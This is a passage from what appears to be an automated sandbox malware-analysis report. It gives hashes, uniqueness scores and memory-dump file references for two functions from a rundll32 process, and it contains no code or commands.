                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B012C6368101AF308851092C02C3E031FC0C0E27320812AB041D4100E4C67C551031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C32049, Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e29158095fab5d6c9c9778fa731923d5c82c34639b2daf61834fb77cecac7c60
                                                                                                                                                                                                                                    • Instruction ID: cc746de2a804423832a2d9883ac362d2da82ce443bfccaf036d10ba24a49e28c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e29158095fab5d6c9c9778fa731923d5c82c34639b2daf61834fb77cecac7c60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B0123F400100ABDB018B00DD04F19BB21EB54702F004110B20554070C3364C60EB05
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions